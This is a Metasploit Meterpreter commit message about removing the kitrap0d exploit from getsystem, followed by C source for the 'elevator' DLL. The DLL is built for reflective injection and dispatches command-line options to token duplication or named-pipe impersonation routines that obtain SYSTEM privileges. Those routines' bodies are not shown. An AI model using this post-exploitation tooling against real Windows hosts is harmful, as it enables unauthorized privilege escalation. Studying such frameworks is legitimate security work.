OJ a9abe738a1 Remove evidence of kitrap0d
This exploit has been causing crashes and BSODs on various systems and
hence is deemed too unstable to be included in the default deployment of
Meterpreter. `getsystem` should only contain code which attempts to get
SYSTEM privileges via safe means; it should not have exploits in it.

This commit removes kitrap0d from `getsystem`. The code will be moved to a
windows local exploit in MSF instead.
2013-11-08 11:34:46 +10:00


//
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll"
// in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
// can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
// not apply to the produced x64 dll.
//
#include "elevator.h"
#include "namedpipeservice.h"
#include "tokendup.h"
#include <limits.h>
// define this as we are going to be injected via LoadRemoteLibraryR
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// define this as we want to use our own DllMain function
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// include the Reflectiveloader() function
#include "../ReflectiveDLLInjection/ReflectiveLoader.c"
/*
 * Grab a DWORD value out of the command line.
 * e.g. elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
 *
 * cpCommandLine: the full command line to search (may be NULL).
 * cpCommand:     the option prefix to look for, e.g. "/FOO:" (may be NULL).
 *
 * Returns the number that follows the first occurrence of cpCommand, parsed
 * with strtoul in base 0 (so "0x.." hex, leading-"0" octal and plain decimal
 * are all accepted), or 0 when either argument is NULL, the option is not
 * present, or nothing numeric follows it.
 */
DWORD elevator_command_dword( char * cpCommandLine, char * cpCommand )
{
    char * cpValue = NULL;

    // Both the haystack and the needle are required.
    if( !cpCommandLine || !cpCommand )
        return 0;

    cpValue = strstr( cpCommandLine, cpCommand );
    if( !cpValue )
        return 0;

    // Skip the option prefix itself; strtoul stops at the first character
    // that is not part of the number, so any trailing " /BAR:.." is ignored.
    return (DWORD)strtoul( cpValue + strlen( cpCommand ), NULL, 0 );
}
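/*
 * Grab a int value out of the command line.
 * e.g. elevator_command_int( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
 *
 * cpCommandLine: the full command line to search (may be NULL).
 * cpCommand:     the option prefix to look for, e.g. "/FOO:" (may be NULL).
 *
 * Returns the decimal number that follows the first occurrence of cpCommand,
 * or 0 when either argument is NULL, the option is not present, or nothing
 * numeric follows it. Values outside the int range are clamped to
 * INT_MIN/INT_MAX instead of overflowing.
 */
int elevator_command_int( char * cpCommandLine, char * cpCommand )
{
    char * cpString = NULL;
    long lValue = 0;

    if( !cpCommandLine || !cpCommand )
        return 0;

    cpString = strstr( cpCommandLine, cpCommand );
    if( !cpString )
        return 0;

    cpString += strlen( cpCommand );

    // strtol rather than atoi: atoi is undefined for out-of-range input,
    // whereas strtol saturates at LONG_MIN/LONG_MAX. For in-range input the
    // two agree (atoi(s) == (int)strtol(s, NULL, 10)), so callers see the
    // same values as before.
    lValue = strtol( cpString, NULL, 10 );
    if( lValue > INT_MAX )
        return INT_MAX;
    if( lValue < INT_MIN )
        return INT_MIN;

    return (int)lValue;
}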
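/*
 * The real entrypoint for this app.
 *
 * cpCommandLine: the command line handed to us by whoever loaded the DLL
 * (rundll32's lpszCmdLine, or lpReserved when loaded via RDI). NULL and
 * empty command lines are ignored.
 *
 * Recognised options (the first one found wins, "/t:" taking precedence):
 *   /t:<thread id>  calls elevator_tokendup() with the parsed thread id and
 *                   SECURITY_LOCAL_SYSTEM_RID, then ends this thread with
 *                   its result.
 *   /p:<pipe name>  calls elevator_namedpipeservice() with the text that
 *                   follows "/p:".
 */
VOID elevator_main( char * cpCommandLine )
{
    DWORD dwResult = ERROR_SUCCESS;
    char * cpPipeName = NULL;

    // %p rather than a DWORD cast: the cast truncates the pointer on x64,
    // so the logged value was wrong there.
    dprintf( "[ELEVATOR] elevator_main. cpCommandLine=%p", (void *)cpCommandLine );

    if( !cpCommandLine || cpCommandLine[0] == '\0' )
        return;

    dprintf( "[ELEVATOR] elevator_main. lpCmdLine=%s", cpCommandLine );

    if( strstr( cpCommandLine, "/t:" ) )
    {
        DWORD dwThreadId = elevator_command_dword( cpCommandLine, "/t:" );
        dwResult = elevator_tokendup( dwThreadId, SECURITY_LOCAL_SYSTEM_RID );
        ExitThread( dwResult );
    }
    else if( ( cpPipeName = strstr( cpCommandLine, "/p:" ) ) != NULL )
    {
        // Take the pipe name from where "/p:" was actually found, rather
        // than assuming the option sits at the very start of the command
        // line (the old code skipped 3 bytes from the start regardless).
        cpPipeName += strlen( "/p:" );
        dwResult = elevator_namedpipeservice( cpPipeName );
    }
}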
/*
 * rundll32.exe entry point.
 *
 * rundll32 supplies the standard (HWND, HINSTANCE, LPSTR, int) arguments;
 * only lpszCmdLine is used here. The command line is handed to
 * elevator_main() and the hosting process is then terminated, so this
 * function never returns.
 */
VOID DLLEXPORT CALLBACK a( HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow )
{
    (void)hWnd;
    (void)hInstance;
    (void)nCmdShow;

    elevator_main( lpszCmdLine );

    // Nothing further to do in this process once elevator_main() returns.
    ExitProcess( ERROR_SUCCESS );
}
/*
 * DLL entry point. If we have been injected via RDI, lpReserved will be our command line.
 *
 * On DLL_PROCESS_ATTACH the module handle is stored in hAppInstance and, if
 * the loader passed a non-NULL lpReserved, that pointer is treated as the
 * command line and given to elevator_main(). Every other reason is a no-op.
 * Always returns TRUE.
 */
BOOL WINAPI DllMain( HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved )
{
    if( dwReason == DLL_PROCESS_ATTACH )
    {
        hAppInstance = hInstance;

        // Reflective loading hands us the command line in lpReserved; a
        // normal LoadLibrary leaves it NULL and nothing runs here.
        if( lpReserved != NULL )
            elevator_main( (char *)lpReserved );
    }
    // DLL_PROCESS_DETACH / DLL_THREAD_ATTACH / DLL_THREAD_DETACH: nothing to do.

    return TRUE;
}